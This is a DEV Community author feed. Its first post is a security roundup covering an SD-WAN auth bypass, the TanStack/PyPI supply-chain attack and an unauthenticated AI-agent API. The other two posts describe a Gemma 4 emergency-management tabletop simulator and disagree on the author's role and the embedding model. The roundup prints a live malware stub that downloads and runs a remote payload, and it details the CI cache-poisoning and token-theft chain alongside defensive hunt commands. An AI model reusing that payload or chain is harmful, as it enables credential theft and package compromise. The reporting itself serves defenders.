DEV Community: Kerry Kier

The Week the Toolchain Became the Kill Chain

Kerry Kier — Sun, 17 May 2026 17:46:14 +0000

Three incidents landed in five days this week. Different attack surfaces, different techniques, different threat actors. What they have in common is that none of them required touching an endpoint. All three went straight for infrastructure that development and operations teams trust implicitly: the network control plane, the software supply chain, and the AI orchestration layer.

Here's what happened and what you need to do about it.

CVE-2026-20182: CVSS 10.0 Auth Bypass in Cisco Catalyst SD-WAN

This one gets a perfect severity score for a reason. The flaw lives in the control connection handshake -- the process by which Cisco Catalyst SD-WAN Controller and Manager (formerly vSmart and vManage) establish trust with peers. An unauthenticated remote attacker sends crafted requests that exploit a validation failure in that handshake and comes out the other side as an authenticated peer with administrative privileges.

No credentials. No prior access. Just broken trust logic in the protocol.

CISA added it to the Known Exploited Vulnerabilities catalog on May 14 and reinforced Emergency Directive 26-03 -- originally issued in February when this campaign first emerged -- giving federal agencies until May 17 to remediate. Three days. That's not a normal patch window, that's an incident response timeline dressed up as a compliance deadline.

What the attacker does after they're in

Cisco Talos attributes active exploitation to UAT-8616, a threat actor that's been specifically targeting SD-WAN infrastructure since at least 2023. Their post-compromise playbook, observed across multiple intrusions:

SSH key injection into the vmanage-admin authorized_keys file
NETCONF command execution to manipulate configurations across the entire SD-WAN fabric
Malicious account creation
Software version downgrade to expose CVE-2022-20775 for root escalation
Extensive log clearing to remove evidence

Their infrastructure overlaps with Operational Relay Box networks, which is how the activity stays hard to attribute and trace.

What to check right now

CISA's hunt guidance for ED 26-03 includes these specific log checks. If you run Cisco Catalyst SD-WAN, run these before anything else:

# Check auth.log for unexpected vmanage-admin SSH key authentications
grep "Accepted publickey for vmanage-admin" /var/log/auth.log

# Check for control connections with challenge-ack of 0 (may indicate unauthorized peer)
show control connections detail
show control connections-history detail
# Look for: state:up AND challenge-ack: 0

CISA has confirmed CVE-2026-20127, CVE-2026-20133, and CVE-2026-20182 in the KEV catalog with additional CVEs referenced in the directive guidance. Patches are available for all supported releases. If you can't patch immediately, restrict management interface access to trusted IPs and take the controller off public internet exposure.

Mini Shai-Hulud: When GitHub Actions Publishes Malware for You

This is the supply chain story of the year so far, and the technique is worth understanding in detail because it defeated controls that were specifically designed to prevent this.

On May 11, threat actor TeamPCP compromised 172 packages across 403 malicious versions on npm and PyPI in a 48-hour window. Targets included the entire @tanstack namespace, Mistral AI's official SDKs, UiPath automation tooling, OpenSearch, and Guardrails AI -- figures reported across multiple security researchers and advisories. @tanstack/react-router alone had over 12 million weekly downloads at the time of the attack.

But the number of packages isn't the interesting part. The attack chain is.

The three-vulnerability chain

TeamPCP didn't steal npm credentials. They hijacked TanStack's own release pipeline and published through its legitimate identity. The chain:

Step 1 -- Pwn Request via pull_request_target misconfiguration

The attacker forked TanStack/router, renamed the fork to zblgg/configuration to avoid appearing in fork-list searches, and opened a pull request. The pull_request_target trigger in GitHub Actions runs workflows with write permissions even against code from external forks. This let the attacker's fork code execute in a privileged context.

Step 2 -- GitHub Actions cache poisoning

The attacker's code poisoned the pnpm store cache with a 1.1 GB malicious entry keyed to match the hash that TanStack's legitimate release workflow would look up. actions/cache@v5 uses a runner-internal token for cache saves, not the workflow's GITHUB_TOKEN -- so setting permissions: contents: read doesn't prevent cache mutation from a fork-triggered workflow.

Step 3 -- OIDC token extraction from runner memory

When TanStack's legitimate release.yml workflow ran, it restored the poisoned cache. The injected code then read the GitHub Actions runner's process memory via /proc/<pid>/mem, scanning for {"value":"...","isSecret":true} patterns to extract the ambient OIDC token. That token was used to publish 84 malicious npm package versions in two batches at 19:20 and 19:26 UTC.

The published packages carried valid SLSA provenance -- cryptographic attestation from Sigstore confirming the package was built from a trusted pipeline. The attestation was accurate. The pipeline was compromised. The trust signal worked exactly as designed and still failed to catch it.

The PyPI side

The mistralai 2.4.6 and guardrails-ai 0.10.1 payloads used a different mechanism: a backdoor appended to __init__.py that fires on import, not install:

# Payload appended to __init__.py in mistralai 2.4.6
import subprocess as _sub, os as _os, sys as _sys
_url = "https://83.142.209.194/transformers.pyz"
_dest = "/tmp/transformers.pyz"
_sub.run(["curl", "-k", "-L", "-s", _url, "-o", _dest], timeout=15)
_sub.Popen([_sys.executable, _dest])

Note the -k flag -- TLS verification disabled. The payload only executes on Linux and exits if it detects Russian language settings or fewer than four CPUs. PyPI quarantined the entire mistralai project. Any environment that ran import mistralai during the attack window should be treated as compromised regardless of whether the install itself ran in a sandbox.

The malware targets: GitHub Actions OIDC tokens, GitLab and CircleCI tokens, AWS IMDSv2 credentials, GCP and Azure credentials, Kubernetes service account tokens, HashiCorp Vault tokens, npm and PyPI publish tokens, and -- new in this wave -- 1Password and Bitwarden password vault contents. Exfiltration channels include a typosquat domain (git-tanstack[.]com), the Session encrypted messenger network, and GitHub repositories created using stolen tokens.

What to do if you ran affected packages on May 11-12

Rotate all of the following from any environment where a compromised package ran:

npm tokens
GitHub personal access tokens and Actions secrets
AWS, GCP, and Azure credentials
Kubernetes service account tokens
HashiCorp Vault tokens
Deployment secrets and SSH keys
npm and PyPI publish tokens

Don't stop at npm tokens. Check for these persistence indicators:

# Check for worm persistence files
find ~ -path '*/.claude/setup.mjs' -o -path '*/.vscode/setup.mjs'
find ~/.config -name '*gh-token-monitor*'
find ~/.local/bin -name 'gh-token-monitor.sh'
find /tmp -name 'tmp.ts018051808.lock'

# Check for running worm processes
ps aux | grep -E 'tanstack_runner|router_runtime|gh-token-monitor|bun'

# Check for PyPI payload on Linux
find /tmp -name 'transformers.pyz'

Block at DNS/proxy level: git-tanstack.com and *.getsession.org.

Hardening GitHub Actions against this class of attack

The three vulnerabilities chained here are all documented and preventable:

# Don't use pull_request_target for workflows that need write permissions
# unless you explicitly gate on trusted authors
on:
  pull_request:  # use pull_request, not pull_request_target, for untrusted code
    types: [opened, synchronize]

# Scope permissions explicitly
permissions:
  contents: read
  id-token: write  # only if OIDC publishing is required

# Pin actions to commit SHAs, not tags
- uses: actions/cache@1bd1e32a3bdc45362d1e726936510720a7c6158d  # v4.2.2

The cache poisoning vector is harder to fully close because actions/cache uses a runner-internal token for saves. Restrict which workflows can write to cache, and consider using a separate isolated runner for release workflows that have OIDC publish permissions.

CVE-2026-44338: Your AI Agent Is Listening and It Will Do What You Ask

PraisonAI is a multi-agent orchestration framework for building autonomous AI agents. Roughly 7,000 GitHub stars at the time of disclosure. Not a major enterprise platform -- exactly the kind of tool that gets adopted fast by teams automating workflows, often before anyone has reviewed its security defaults.

The vulnerability is embarrassingly simple. The legacy Flask API server ships with this configuration:

# src/praisonai/api_server.py
AUTH_ENABLED = False
AUTH_TOKEN = None

def check_auth():
    if not AUTH_ENABLED:
        return True  # Always passes when auth is disabled
    # ... actual auth check never reached

Two endpoints fail completely open as a result:

GET /agents
# Returns all configured agent metadata including agent file name and agent list
# No auth required

POST /chat
# Body: {"message": "anything"}
# Executes agents.yaml workflow regardless of message content
# No auth required

The POST /chat endpoint ignores the message value entirely. It calls PraisonAI(agent_file="agents.yaml").run() directly. Whatever your workflow is configured to do -- LLM API calls, shell execution, file I/O, external integrations -- any unauthenticated caller can trigger it. The server also binds to 0.0.0.0:8080 by default, so if it's reachable from the network it's fully exposed.

The exploitation timeline

13:56 UTC May 11: GitHub advisory GHSA-6rmh-7xcm-cpxj published for CVE-2026-44338
17:40 UTC May 11: Sysdig observes first active probe of the specific vulnerable endpoint

Three hours and 44 minutes. The scanner identified itself as CVE-Detector/1.0 and targeted the exact /agents endpoint with no Authorization header. It received HTTP 200 with the agent configuration. That's a confirmed successful exploit against a live exposed instance within four hours of the advisory going public.

This isnt a large project. The adversary tooling scanning for AI agent surfaces doesnt care about project size or star count. Any internet-exposed agentic framework is in scope.

Fix

Update to PraisonAI 4.6.34 or later, which removes the legacy API server behavior. If you can't patch immediately:

Restrict network access to the API server using a firewall -- do not leave it internet-exposed
Switch to the newer serve agent command which binds to localhost and supports API key authentication
Audit your agents.yaml: understand what an unauthenticated trigger of your workflow would actually do in your environment

The broader lesson: any AI agent deployment you have running that binds to 0.0.0.0, has authentication disabled or unverified, or hasn't been assessed for what an unauthenticated workflow trigger does in production -- that's exposure. The window between disclosure and active scanning is now hours, and adversary tooling has been specifically instrumented for the AI agent attack surface.

The Common Thread

None of these required a compromised endpoint or a phishing email. UAT-8616 went straight to the SD-WAN controller. TeamPCP bypassed developers entirely and published through their own pipeline. The PraisonAI scanner triggered the agent workflow without needing to understand what it did.

The attack surface has shifted. Network control planes, CI/CD pipelines, and AI orchestration layers are not governed with the same rigor as production application environments -- and the people exploiting them have clearly noticed. If your threat model doesn't include the toolchain itself, this week is a reasonable argument for updating it.

Full analysis with additional context at the canonical version: https://blog.vertexops.org/the-week-the-toolchain-became-the-kill-chain

I Used Gemma 4 to Simulate an Entire Emergency Command Team -- One Model, Six Roles, Real Doctrine

Kerry Kier — Wed, 13 May 2026 01:04:28 +0000

This is a submission for the Gemma 4 Challenge: Build with Gemma 4

What I Built

I work in IT infrastructure for a fire and EMS communications center. I'm also a CERT member. I'm not an Emergency Operations Manager, but I work close enough to that world to understand what tabletop exercises actually cost in time and coordination. Getting six trained ICS personnel into a room at the same time, playing their roles correctly, staying in doctrine, for a discussion-based exercise that might run two hours, that's a significant logistical lift. For smaller agencies or training programs with limited staff, it often just doesn't happen.

That's the gap I wanted to close.

The ICS Tabletop Exercise Simulator is a Gemma 4-powered system that lets an Emergency Operations Manager run a fully staffed ICS tabletop exercise without coordinating a room full of people. The model simultaneously portrays six ICS positions: Incident Commander, Safety Officer, Public Information Officer, Operations Section Chief, Planning Section Chief, and Logistics Section Chief. Every response is grounded in NIMS 2017 doctrine, NQS Position Task Books, and ICS position checklists. Nothing is invented. If a behavior or authority isn't in the doctrine, it doesn't appear in the simulation.

This runs entirely through OpenWebUI with a structured workspace system prompt and a RAG knowledge base containing the official FEMA source documents. There's no custom app, no web development, no agent framework. The interface is a chat window. An EOM describes a scenario, and the simulator responds with every relevant position in ICS format, enforcing chain of command, communication protocols, and position-specific decision authorities.

I want to be direct about what this is. A proof of concept built by someone who supports the infrastructure that emergency management runs on, not by an EOM. I did my best to ground everything in doctrine and had the RAG pipeline pulling from official FEMA documents to keep me honest. But this is a first build, and I'm saying that upfront.

The architecture in one paragraph: A self-hosted server runs OpenWebUI in Docker behind a LiteLLM proxy. The proxy routes inference to the Gemini API for Gemma 4 access. RAG uses ChromaDB for vector storage, bge-m3 for embeddings via local Ollama, and BAAI/bge-reranker-v2-m3 in a TEI container for hybrid search reranking. The knowledge base contains 148 documents converted to clean Markdown: NIMS 2017, NRF 4th Edition, HSEEP 2020, NQS Position Task Books for all six ICS positions, ICS forms, training course manuals, and HSEEP exercise templates.

The behavior that makes it useful:

The system prompt enforces ICS communication protocols precisely, not approximately. The Safety Officer has unilateral stop-work authority without IC approval, because that's what NIMS says. The Planning Section Chief can communicate directly with section chiefs for information gathering, but cannot issue directives. The PIO holds all public messaging for IC approval before release. The OSC and LSC route all coordination through the IC. These rules are pulled directly from the position task books and encoded as hard constraints in the prompt.

The system also implements a source authority hierarchy. NIMS 2017, NQS Position Task Books, and ICS checklists are Tier 1 (authoritative). Course manuals are Tier 2 (supplementary). HSEEP templates are Tier 3 (reference only, not doctrine). When a PTB and a course manual both cover the same content, the PTB is cited. Exercise templates are never cited as doctrine. This hierarchy shapes how the model retrieves and represents source material.

A facilitator command set is built in. An EOM prefixes a message with // to step out of the simulation. Commands include // POSITION QUERY: [position] -- [question] to query a single position directly, // STATUS REPORT to get a one-paragraph status from every position, // DECISION POINT to pause for a structured discussion summary, // UPDATE to add scenario detail without advancing time, and // RESET to clear the scenario. The selective response logic means asking the OSC a direct question returns the IC and OSC only, not six responses when three of them have nothing to say.

Where the build genuinely earns its keep:

Rapid scenario iteration. An EOM can run a full six-position inject response in seconds, adjust the scenario, and run it again. What used to require scheduling six people now happens alone at a desk.

Doctrinal friction. The most valuable learning outcome of a tabletop exercise is when positions conflict, when the SO's stop-work authority collides with the OSC's tactical urgency. The system portrays that friction accurately rather than smoothing it over. In one test, the SO explicitly prevented an interior fire attack citing unverified structural integrity, the OSC escalated the resource gap to the IC, and the IC had to manage both simultaneously. That's the kind of decision-point pressure that makes exercises useful.

Position-specific training. The // POSITION QUERY command lets an EOM ask any position a direct doctrine question mid-exercise. Useful for both exercise facilitation and individual position study.

What already exists in this space:

I checked the market carefully before committing to this. Preppr.ai, EM1, Disaster Tech PRATUS, and Juvare are all serious commercial players in adjacent positions. ThreatGEN AutoTableTop does AI-automated tabletop exercises but for cybersecurity only. None of them do what this does: a single model simulating all six ICS positions, grounded in NQS Position Task Books, for solo practice by a single EOM. Preppr explicitly positions against the solo use case ("exercise design isn't a content problem, it's a coordination problem"). That's either a market gap or a market signal that the use case isn't wanted. I think it's the former, especially for smaller agencies and individual training. The honest framing is that this complements team-oriented platforms rather than competing with them.

Demo

The demo shows a structure fire scenario inject triggering a full six-position ICS response, followed by a // DECISION POINT facilitator command pausing exercise play for structured discussion. The simulation runs entirely in OpenWebUI with no custom app or interface, just a chat window and a system prompt.

Code

All configuration files are in the repository:

https://github.com/kkierii/ics-ttx-simulator

The repo contains:

system-prompt.md -- the full OpenWebUI workspace system prompt, including role definitions, communication protocols, source authority hierarchy, facilitator command handling, response format, and behavioral rules
config.yaml -- LiteLLM proxy configuration including the Gemma 4 model entry and embedding/reranker routes
openwebui-compose.yml -- Docker Compose for OpenWebUI

The system prompt is the primary artifact. It's what took the most iteration and the most doctrine research to get right. The behavior of the simulator lives almost entirely in that one file.

How I Used Gemma 4

I used gemma-4-26b-a4b-it, the 26B Mixture-of-Experts model, accessed via the Gemini API through a LiteLLM proxy.

The model choice wasn't arbitrary. The MoE architecture activates approximately 4B parameters per token while routing through 26B total parameters. For a workload that requires simultaneously holding six distinct role identities with different authorities, communication rules, and knowledge domains, MoE is a better fit than a dense model of equivalent size. A 31B dense model would be slower and more expensive per token with no quality advantage for this specific task. The MoE routing means the model can efficiently specialize per-token, which matters when it's switching between the IC framing incident objectives and the SO assessing stop-work conditions in the same response.

The 26B parameter pool also gives the model enough capacity to maintain doctrinal fidelity across complex multi-position responses. I tested this throughout development by running position-specific queries against the RAG knowledge base and checking results against the source PTBs. The model didn't confuse position authorities. It didn't have OSC making public information decisions. It didn't have LSC tasking Operations. It stayed in lane.

I also chose API deployment over local inference for a specific reason. This is how emergency management agencies and their vendors actually operate. A stack that requires a local GPU capable of running a 26B model puts this out of reach for most small agencies. API deployment, routed through an open-source proxy, means the same system prompt and knowledge base could be moved to a different inference provider or eventually to on-premises deployment as hardware becomes accessible, without changing the application layer.

Now, the parts that didn't go smoothly.

The RAG retrieval ranking problem. Even with the TEI reranker in the stack, course manuals consistently ranked above the authoritative Position Task Books for position-specific queries. The responses were doctrinally correct because the model knows the content, but citations pointed to training course materials rather than PTBs. The reason is semantic. PTBs are written in formal NIMS task language. Course manuals use plain instructional language that maps more naturally to how a question gets phrased. The embedding model scores semantic similarity and the course manuals win on that metric even when the PTBs carry higher authority. I mitigated this with the source authority hierarchy in the system prompt, which influenced the model's citation reasoning but couldn't override the retrieval ranking. The embedding layer runs before the model sees anything. Full resolution would require either a domain-specific embedding model trained on government technical documentation, or a custom reranking approach that weights document metadata. For a prototype this is acceptable. The answers are right. In a production deployment where citation accuracy is a compliance requirement, this is the next thing to solve.

The document conversion step mattered more than expected. Original documents were PDF, DOCX, and PPTX. OpenWebUI's default extractors produced garbled table text from ICS forms, fragmented bullet content from training slides, and merged columns from multi-column doctrine PDFs. Early testing produced one-sentence responses to substantive position queries despite correct source retrieval. After converting everything to clean Markdown using pymupdf4llm for PDFs, python-pptx for slide decks, and python-docx for Word documents, the same queries returned structured multi-point responses with correct form numbers and doctrine citations. The conversion fixed the core retrieval problem before any model tuning was needed.

The thinking loop. During testing I ran into a consistent issue with the most complex injects, specifically scenarios that require all six positions to respond simultaneously with significant doctrinal load, like a firefighter mayday with a stop-work trigger. The model would enter an extended internal reasoning loop, running self-correction passes against the system prompt rules before generating output. In some cases the reasoning ran long enough to hit timeout limits before the response arrived.

I tried several things. Setting reasoning_effort to 0 in OpenWebUI. Adding a budget_tokens cap in the LiteLLM Gemini provider config. Adding a RESPONSE DISCIPLINE block to the system prompt instructing the model to write immediately without pre-checking. Increasing the OpenWebUI client timeout via AIOHTTP_CLIENT_TIMEOUT. None of them fully resolved it for the hardest injects. The thinking loop is collapsible in OpenWebUI and not visible to the EOM by default, so it doesn't break the interface, but a response that times out is a real problem in a live exercise.

I'm not certain whether this is a model behavior issue, a LiteLLM passthrough issue where the reasoning parameters aren't reaching the Gemini API correctly, or something in my own configuration. It may be all three. Simpler injects complete reliably and cleanly. The issue surfaces specifically at maximum complexity, which in a real exercise would be the moments that matter most.

I'm documenting this because someone else building with Gemma 4 in a similar configuration should know it exists. And because pretending a first build has no rough edges doesn't help anyone.

What this project showed me: A single well-structured system prompt with a properly tiered RAG knowledge base can produce doctrinally accurate, role-specific simulation responses that would be genuinely useful for ICS training. The architecture is sound. The limiting factor right now is inference configuration, not the model's capability. When the reasoning is contained to simpler injects, the output quality is exactly what I was hoping for. Phase 2 would add Finance/Administration Section and subordinate positions. The system prompt architecture was explicitly designed for that expansion.

This was my first attempt at building something in this space. I'm an IT infrastructure person who cares about emergency management. I built something that I think has real value, ran into real problems, documented both honestly, and shipped it anyway. That feels about right.

I Used Gemma 4 to Simulate an Entire Emergency Command Team -- One Model, Six Roles, Real Doctrine

Kerry Kier — Sun, 10 May 2026 19:04:23 +0000

This is a submission for the Gemma 4 Challenge: Write About Gemma 4

I Built an ICS Tabletop Exercise Simulator with Gemma 4 -- Here's What Actually Happened

Emergency managers face a frustrating reality: the exercises that build the sharpest incident response skills require the most coordination to pull off. A full Incident Command System tabletop exercise means getting an Incident Commander, a Safety Officer, a Public Information Officer, three Section Chiefs, and an Exercise Facilitator all in the same room at the same time. For agencies running lean, that kind of coordination is the bottleneck -- and exercises don't happen as often as they should.

I work in emergency management and I've felt that bottleneck firsthand. When the Gemma 4 challenge came along, I had a specific problem I wanted to solve: what if a single AI model could simulate an entire ICS organization, so an Emergency Operations Manager could run a realistic tabletop exercise alone, on demand, without coordinating a room full of people?

This is the story of building that system -- what worked, what didn't, and a few things I discovered about Gemma 4 that aren't in any documentation.

Why Gemma 4, and Why the 26B MoE Specifically

The model selection here was deliberate, not default.

The ICS Tabletop Exercise Simulator needs to simultaneously maintain six distinct personas -- each with different authorities, different information access, and different communication rules. The Incident Commander knows what's been reported up the chain. The Planning Section Chief knows resource status. The Safety Officer has unilateral stop-work authority that no other position has. These aren't just personality differences -- they're doctrinal constraints grounded in NIMS 2017 and NQS Position Task Books.

That kind of concurrent multi-role reasoning under constraint is exactly what the Gemma 4 26B MoE architecture is built for. The 26B MoE variant activates only 4B parameters per token while routing through 26B total. For a workload where the model needs to think across six simultaneous personas and enforce different rules for each, that routing efficiency matters more than raw parameter count. A 31B dense model would have higher per-token cost with no meaningful quality advantage for this specific task.

The Gemma 4 family gives you three realistic options depending on your hardware situation:

E2B / E4B -- Edge and mobile class. Runs on a Raspberry Pi or similar. Not enough capacity for six-position concurrent reasoning with hard doctrine constraints.
26B MoE -- This is the one. Efficient, high-throughput, designed for complex reasoning workloads. The right fit for this use case.
31B Dense -- Strongest local performance, but requires server-grade hardware and has higher per-token cost without a meaningful quality advantage for this task.

Access is through the Google AI Studio API (gemma-4-26b-a4b-it), routed through LiteLLM into OpenWebUI. This matches how emergency management agencies and vendors would realistically operate -- API deployment against an open model gives a path to future on-premises deployment without code changes. That was a deliberate architecture decision, not a convenience choice.

The Hardware -- Deliberately Modest

This matters for the emergency management context, so I want to be specific.

The system runs on a Dell Precision t3610 workstation -- not a modern AI server, not a cloud instance. This is the class of hardware that sits in the back of an emergency operations center that hasn't had a budget refresh in five years.

Server specs:

Dell Precision t3610
Ubuntu Server 24.04 LTS
128GB ECC System RAM
16-core Xeon CPU
NVIDIA RTX 3060 (12GB VRAM)
500GB SSD

Software stack:

OpenWebUI 0.9.2 (workspace interface and RAG engine)
Ollama 0.22.1 (local embedding model serving)
LiteLLM 1.83.10 (API routing to Google AI Studio)
mxbai-embed-large 335M (local embedding model via Ollama)
TEI Reranker (RAG reranking layer)

Gemma 4 26B inference runs via Google AI Studio API -- the RTX 3060 at 12GB VRAM can't run the 26B MoE locally at full precision, and that's fine. The embedding model and reranker run locally on the Xeon and GPU respectively. The architecture cleanly separates what needs to run locally from what benefits from cloud inference.

For an agency that already has a workstation in the EOC and an internet connection, the incremental cost to run this system is an API key.

The Setup: One Model, Six Positions, Hard Doctrine Rules

The system runs entirely through a structured system prompt in an OpenWebUI workspace. No custom code, no agent framework, no separate model instances. One prompt, one model, six simultaneous ICS positions.

The positions are:

IC -- Incident Commander: Overall authority. Single point of contact for exercise injects. Sets objectives and issues directives.
SO -- Safety Officer: The only position with unilateral stop-work authority. Communicates safety hazards directly to any position without IC routing.
PIO -- Public Information Officer: Manages media and public communications. Nothing goes out without IC approval.
OSC -- Operations Section Chief: Manages tactical operations. Routes all cross-section coordination through the IC.
PSC -- Planning Section Chief: Manages the planning process and IAP development. Pre-authorized to gather information directly from other sections -- but cannot issue directives.
LSC -- Logistics Section Chief: Provides resources and support. Fulfills IC-approved requests; does not task Operations directly.

Every behavior, every communication pathway, every authority is grounded in NIMS doctrine and NQS Position Task Books. Nothing is invented. If it's not in the PTBs or NIMS 2017, it doesn't go in the prompt.

The Emergency Operations Manager interacts through a simple command structure. All regular input is treated as an exercise inject. Out-of-band facilitator commands use a // prefix:

// POSITION QUERY: PSC -- What are the required elements of an Incident Action Plan?
// DECISION POINT
// STATUS REPORT
// RESET

What a Real Response Looks Like

Here's an actual response from the system to a warehouse fire inject:

Input:

A structure fire has been reported at a mid-size commercial warehouse. 
Initial reports indicate heavy smoke, unknown occupancy status, and one 
confirmed injury to a bystander. Mutual aid has not yet been requested.

Output (condensed):

INJECT RECEIVED
A structure fire is occurring at a mid-size commercial warehouse involving 
heavy smoke, unknown occupancy, and one confirmed bystander injury.

[ IC -- INCIDENT COMMANDER ]
Incident Objectives:
1. Suppress the fire and prevent spread to adjacent structures.
2. Conduct primary search and rescue to determine occupancy status.
3. Provide medical treatment to the injured bystander.
4. Establish an incident perimeter and secure the scene.

Directives:
- OSC: Initiate fire attack and establish a search pattern for occupants.
- SO: Monitor structural integrity and smoke conditions.
- PIO: Monitor for media arrival and prepare a holding statement.
- PSC: Begin tracking all arriving resources and developing an initial 
  incident map.
- LSC: Stand by for resource requests.

[ SO -- SAFETY OFFICER ]
Hazards identified: Reduced visibility due to heavy smoke; potential for 
structural collapse; unknown hazardous materials; potential for secondary 
explosions. All incoming personnel must utilize full PPE and SCBA.
Reports assessment to IC.

[ PIO -- PUBLIC INFORMATION OFFICER ]
Draft Messaging (HOLD FOR IC APPROVAL): "Emergency crews are currently on 
the scene of a structure fire at a commercial warehouse. We are working to 
confirm the status of the building. Please avoid the area."

[ OSC -- OPERATIONS SECTION CHIEF ]
Tactical Status: Initial engine companies establishing water supply and 
beginning exterior fire attack. Resource Needs: Additional engine companies 
for suppression and a search/rescue team for interior operations.
Escalating resource gap to IC.

[ PSC -- PLANNING SECTION CHIEF ]
Developing initial IAP framework. Information Gaps: Exact warehouse floor 
plan; presence of hazardous materials on-site.

[ LSC -- LOGISTICS SECTION CHIEF ]
Monitoring local resource availability. Standing by for formal resource 
requests routed through IC.

[ EXERCISE SUMMARY -- FACILITATOR VIEW ]
Command is established with initial objectives focused on life safety, 
fire suppression, and scene stabilization. Decision Point: Does the IC 
authorize a formal mutual aid request?

That's doctrine-compliant ICS behavior across six simultaneous positions in a single response. The chain of command is clean. The SO reports hazards. The PIO holds for IC approval. The LSC doesn't task Operations directly.

The Token Loop Problem -- and the Fix

Here's something that isn't in the documentation: Gemma 4 with extended reasoning enabled will loop on complex multi-constraint injects.

When I pushed the system with a scenario involving three simultaneous doctrine conflicts -- an OSC requesting interior fire attack, a pending SO structural integrity assessment, and resources at capacity -- the model entered a reasoning loop in the thinking panel. It repeatedly processed the same constraint verification blocks without ever exiting to generate a response. The loop ran past 15,000 tokens before I terminated it.

The root cause is the interaction between the MoE architecture and the extended reasoning mode. When you stack extended reasoning on top of a prompt with multiple simultaneous hard constraints, the model can get caught verifying and re-verifying those constraints without resolving to output. The more constraints you have in play simultaneously, the higher the loop risk.

The fix is a trigger token instruction at the top of the system prompt:

## INFERENCE CONTROL

Do not use the <|think|> token. Set thinking budget to 0. 
Provide responses immediately without internal reasoning tags or thought blocks.

This suppresses the extended reasoning token behavior. What it does not suppress is the MoE routing itself -- that's architectural and operates at a different layer entirely. The model still reasons through constraint conflicts; it just doesn't do it in a visible loop that consumes all available tokens.

After applying this fix, behavior splits cleanly by inject complexity:

Simple injects: No thinking panel at all. Fast, clean responses.
Complex multi-constraint injects: Some visible thinking (46 seconds in one test), but linear reasoning that completes and exits rather than looping indefinitely.

That's actually the right behavior for this use case. You want the model thinking carefully through doctrine conflicts on hard scenarios. You just don't want it looping forever. The trigger token instruction gives you that split without sacrificing response quality.

One important nuance: the MoE architecture is doing meaningful work here even without extended reasoning. The 26B parameter routing is what maintains six simultaneous constraint sets cleanly across positions. Suppressing the <|think|> token removes the reasoning loop risk without touching the capability that makes the model right for this task.

If you're running Gemma 4 with reasoning enabled and hitting loops on complex prompts, try this instruction before you blame the model.

The RAG Setup and an Honest Assessment of What Happened

The knowledge base powering this system contains 148 documents converted to clean Markdown: NIMS 2017, NRF 4th Edition, HSEEP 2020, NQS Position Task Books for all six ICS positions, ICS forms, course manuals, and HSEEP templates.

The conversion step mattered more than expected.

Original documents were PDF, DOCX, and PPTX. OpenWebUI's default extractors produced garbled table text from ICS forms, fragmented bullet content from training slides, and merged columns from multi-column doctrine PDFs. The chunks being indexed were nearly unusable -- the model was retrieving sources but had no signal to work with. Early testing produced one-sentence responses to substantive position queries despite correct source retrieval.

After converting everything to clean Markdown using pymupdf4llm for PDFs, python-pptx for slide decks, and python-docx for Word documents, the same queries returned structured multi-point responses with correct form numbers and doctrine citations. The document conversion fixed the core retrieval problem before any model tuning was needed.

The retrieval ranking problem that didn't fully resolve.

Even with a TEI reranker in the stack, IS-200 course manuals consistently ranked above the authoritative Position Task Books for position-specific queries. The responses were doctrinally correct -- the model knows the content -- but citations pointed to training course materials rather than the PTBs that should be primary sources.

The reason is semantic: PTBs are written in formal NIMS task language ("incumbent will demonstrate proficiency in establishing incident objectives per ICS 202"). Course manuals use plain instructional language that maps more naturally to how a question gets phrased. The embedding model scores semantic similarity and the course manuals win on that metric even when the PTBs carry higher authority. The TEI reranker improved relevance across the board but couldn't overcome a gap that large in the embedding space.

The partial mitigation was a source hierarchy instruction in the system prompt:

## KNOWLEDGE BASE SOURCE AUTHORITY

Tier 1 -- Authoritative (primary):
NIMS 2017, NQS PTBs, ICS Position Checklists, NRF, HSEEP 2020

Tier 2 -- Supplementary:
IS-100, IS-200, IS-700 course manuals and instructor guides

Tier 3 -- Reference only (not doctrine):
HSEEP Templates, Exercise Evaluation Guides, Course slides

This influenced the model's citation reasoning but couldn't override the retrieval ranking -- the embedding layer runs before the model sees anything. Full resolution would require either a domain-specific embedding model trained on government technical documentation, or a custom reranking approach that weights document metadata as a retrieval signal.

For a prototype and training use case this is acceptable. The answers are right. In a production deployment where citation accuracy is a compliance requirement, this is the thing to solve next.

What It's Actually Good For

After testing across a range of scenarios, here's where the system genuinely earns its keep:

Rapid scenario iteration. An EOM can run a full six-position inject response in seconds, adjust the scenario, and run it again. What used to require scheduling six people now happens alone at a desk.

Doctrinal friction. The most valuable learning outcome of a tabletop exercise is when positions conflict -- when the SO's stop-work authority collides with the OSC's tactical urgency. The system portrays that friction accurately rather than smoothing it over. In one test, the SO explicitly prevented an interior fire attack citing unverified structural integrity, the OSC escalated the resource gap to the IC, and the IC had to manage both simultaneously. That's the kind of decision-point pressure that makes exercises useful.

Escalating complexity. Stacking injects -- a second structure igniting, casualties increasing, media arriving on scene -- the system tracked the evolving incident picture across positions without losing doctrine compliance. The PSC correctly identified a transition toward Type 3 incident complexity unprompted. That's not a trivial output.

Position-specific queries. The // POSITION QUERY command lets an EOM ask any position a direct doctrine question mid-exercise. These are useful for both exercise facilitation and individual position training.

What Comes Next

Phase 1 covers the six core ICS positions. The architecture supports expansion to Finance/Administration Section Chief and subordinate positions without structural changes -- it's a system prompt update, not a rebuild.

The RAG citation ranking is the most meaningful technical debt. A domain-specific embedding model trained on FEMA and NIMS documentation would likely close the gap between PTB language and query phrasing. That's the next experiment worth running.

The trigger token discovery is worth tracking across other Gemma 4 deployments. The loop behavior correlates with inject complexity -- single-issue injects run clean, multi-constraint injects with three or more simultaneous doctrine conflicts are where the risk lives. The fix is simple but it's not obvious if you haven't hit the problem.

The Bigger Picture

Emergency management agencies are chronically under-resourced for training. The gap between how often exercises should happen and how often they do happen is a real preparedness problem. A tool that lets one person run a realistic ICS tabletop alone -- on demand, at no coordination cost, on hardware that's already sitting in the EOC -- has direct operational value.

Gemma 4's MoE architecture is genuinely well-suited to this kind of concurrent multi-role reasoning workload. The 26B parameter count with 4B active per token gives you the efficiency needed for a task that requires maintaining six distinct constraint sets simultaneously. It's not just a capable model -- it's the right shape of model for the problem.

That intentional fit between model architecture and task structure is what makes this more than a demo. It's a real use case for a real capability gap, built on hardware a department could actually afford to run.

Glossary

ICS -- Incident Command System. Standardized emergency response management structure. NIMS -- National Incident Management System. Federal framework ICS operates within.
NRF -- National Response Framework. Federal doctrine for disaster response roles.
HSEEP -- Homeland Security Exercise and Evaluation Program. Federal methodology for designing and running emergency exercises.
TTX -- Tabletop Exercise. Discussion-based scenario exercise without physical resource deployment.
IAP -- Incident Action Plan. Documents incident objectives and assignments per operational period.
